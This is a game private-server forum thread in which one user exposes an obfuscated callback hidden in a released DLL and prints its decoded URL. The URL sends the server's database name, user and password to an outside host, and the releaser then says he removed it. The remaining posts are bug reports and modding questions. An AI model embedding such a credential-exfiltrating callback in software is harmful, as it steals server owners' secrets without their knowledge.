• Unfortunately, we have experienced significant hard drive damage that requires urgent maintenance and rebuilding. The forum will be a state of read only until we install our new drives and rebuild all the configurations needed. Please follow our Facebook page for updates, we will be back up shortly! (The forum could go offline at any given time due to the nature of the failed drives whilst awaiting the upgrades.) When you see an Incapsula error, you know we are in the process of migration.

Acturus files New features

Initiate Mage
Reaction score
WTF? The files are backdoored!

Found this in the binary SHO_GS.dll:
Code:
lxxt>33eisrkeqiw2rix3vxe3vikcfhw2tltCwivzivcmtA)w*gpmirxctsvxA)m*pskmrcmtA)w*pskmrctsvxA)m*hfcmtA)w*hfcreqiA)w*hfcywivA)w*hfcteww{svhA)w

Too bad that this is such an easy cipher.

Code:
http://aeongames.net/rta/reg_bds.php?server_ip=%s&client_port=%i&login_ip=%s&login_port=%i&db_ip=%s&db_name=%s&db_user=%s&db_password=%s

I didn't expect this from a osROSE moderator.

Last edited:
Reaction score

Code:
lxxt>33eisrkeqiw2rix3vxe3vikcfhw2tltCwivzivcmtA)w*gpmirxctsvxA)m*pskmrcmtA)w*pskmrctsvxA)m*hfcmtA)w*hfcreqiA)w*hfcywivA)w*hfcteww{svhA)w

Code:
http://aeongames.net/rta/reg_bds.php?server_ip=%s&client_port=%i&login_ip=%s&login_port=%i&db_ip=%s&db_name=%s&db_user=%s&db_password=%s

Hmmm.... it looks like it's for the server online status,
but I don't know why it logs my db pass and db user...

Initiate Mage
Reaction score
Hmmm.... it looks like it's for the server online status,
but I don't know why it logs my db pass and db user...

The original url of reg_bds.php is still in this server (to jROSE or roseonline.co.kr, one of them). This one is completely new and definitively NOT for server status.

Reaction score
Ahem... explain MORE, "I got znzin.dll error sir" is not going to help any of us.
Did you use his glow fix? It should fix the glowing, if that is what you mean.

/***********************************************************************************/

Bug report:
When I party up with my cleric (so I dual client), and when the characters are fully buffed,
they turn blue, get transparent and are roughly half there size (that's what I see with the other client).
And the text "party" overlaps the party window, instead the party window overlapping the party text.
I'm using HRose client original.

Experienced Elementalist
Reaction score
Hey guys! I'm back from my great week at E3. Sucks that I didn't have internet but still. It was awesome.

Code:

Code:

That shouldn't have even been in these releases.

I forgot about that because that was made for my own server so if it ever got hacked I would know where the server went, and that must be the reason why my website has been so slow.

Thanks for telling me, I'm removing it now.

---------- Post added at 11:07 AM ---------- Previous post was at 11:05 AM ----------

Ahem... explain MORE, "I got znzin.dll error sir" is not going to help any of us.
Did you use his glow fix? It should fix the glowing, if that is what you mean.

/***********************************************************************************/

Bug report:
When I party up with my cleric (so I dual client), and when the characters are fully buffed,
they turn blue, get transparent and are roughly half there size (that's what I see with the other client).
And the text "party" overlaps the party window, instead the party window overlapping the party text.
I'm using HRose client original.

I'll fix this, just an issue with the box.

Experienced Elementalist
Reaction score
Ok, I just 0'd it out so it's removed.
And thanks for going to fix the bug ;)
btw, did you already post the fixed version of your HRose client?

I haven't yet. I went to sleep because I was soooo tired >.<. I'll post it later today and make a new post saying I did.

Experienced Elementalist
Reaction score
sir i got this error..i already use your znzin file

Something went wrong in your game, or some program modded your game's memory and either overwrote the pointer to znzin or did something to mess it up. Basiclly that error # is there because the pointer to znzin is corrupt.

Newbie Spellweaver
Reaction score
hey raven can you please make max lvl 270 and max stat 400

Last edited:
Newbie Spellweaver
Reaction score
and if u can reupload tgamectlr_r.zip please because when i try to open it it says this file is damaged and can't be opened

Newbie Spellweaver
Reaction score
Hello,

I used the files Arcturus this posting, referring to the max level 255/400 status, modified the SHO on my dedicated, but it's time to play when the player reaches level 200 +, fail to make the character SP continuously with another problem, some characters are small and transparent blue!

Please tell me what this is Raven? Since I already thank you!

Images below:

Uploaded with

Experienced Elementalist
Reaction score
I also have this problem with blue character level 210 stats 300
several registration table in the server rather than just chat log in the folder but not written

Experienced Elementalist
Reaction score
The blue is the gigatean skill effect from PRE-EVO. Basiclly I would have to find where it calls to it and remove it. With the SP, try checking your LIST_SKILL_P.stb and make sure it goes upto your max level

Newbie Spellweaver
Reaction score
Hello,

I used the files Arcturus this posting, referring to the max level 255/400 status, modified the SHO on my dedicated, but it's time to play when the player reaches level 200 +, fail to make the character SP continuously with another problem, some characters are small and transparent blue!

Please tell me what this is Raven? Since I already thank you!

Images below:

Uploaded with

Hello, I discovered another problem! I was doing some tests, when I came across was that all playes with access to GM released, since the SQL table are as number one. And again back the original files on Arcturus it works normal, I hope that we help, since I'm finding some bugs. And it is not boring, you could not provide the STB List_Skill_p edited down to level 255, as mine is up to 150. (LOL)

And now I appreciate it.​

Experienced Elementalist
Reaction score
LIST_SKILL_P.stb file is the same level as the level max
It is not visible to everyone.
Example the player has two accounts connected and can see this, me with another account I see it as the sceen
I hope to understand is

@ NickWakeeh
Yes you are right, the players have access to / na
I have a file LIST_SKILL_P.stb change by myself up to level 210
because for months the original provides very little Poins Skills
based on this site :
Mp me if you're interested

Last edited:
Back